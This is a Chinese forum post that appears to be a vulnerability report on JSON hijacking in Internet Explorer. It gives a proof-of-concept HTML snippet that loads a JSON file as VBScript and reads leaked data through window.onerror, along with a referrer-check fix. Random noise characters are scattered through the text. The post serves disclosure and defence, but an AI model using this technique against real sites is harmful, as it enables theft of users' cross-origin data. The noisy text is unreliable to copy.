简要描述:8 |( N0 \! E4 N/ [. D2 e
2 m3 c9 P5 \$ J9 e' E# N由于某些资源容器对数据处理不当导致json劫持漏洞.
7 ~ x. h. \8 P' K! R详细说明:
; ? v, {' ~ F/ w8 u3 m. C2 W由于ie支持vbscript,所以script元素可以指定成vbscript语言:+ D( {. c' ~, Q8 V7 _! U
<script language=vbscript></script>
% {% O9 n8 ^% k 7 V8 j' B5 k: ^( c
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.3 E" e0 M0 a- {- w
漏洞证明:2 f; W* c' p( W( n& s
<script>) ^* h* @% x0 @0 A# p7 k! G8 z. J
window.onerror=function(_){
8 w, W' @5 J# A; d Salert(_)
8 t, Y8 e" `/ I. R% I8 D}9 [" E/ n; W) B! y2 V% }
</script>
; S1 C* l* _( }, ?4 ~<script language=vbscript src=1.json></script>
; A0 c5 f/ T, } f2 M 9 L" k( U$ b" Z4 ?# R
# j4 ]* s# N3 f1.json:/ A; x3 T& h4 U5 k3 V3 B3 K, u
[{"name":"sogili","age":19}]9 A! k6 d, y/ f1 m9 \+ a% e, A
修复方案:
5 P* N: ?$ ]- |( O9 ? @网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对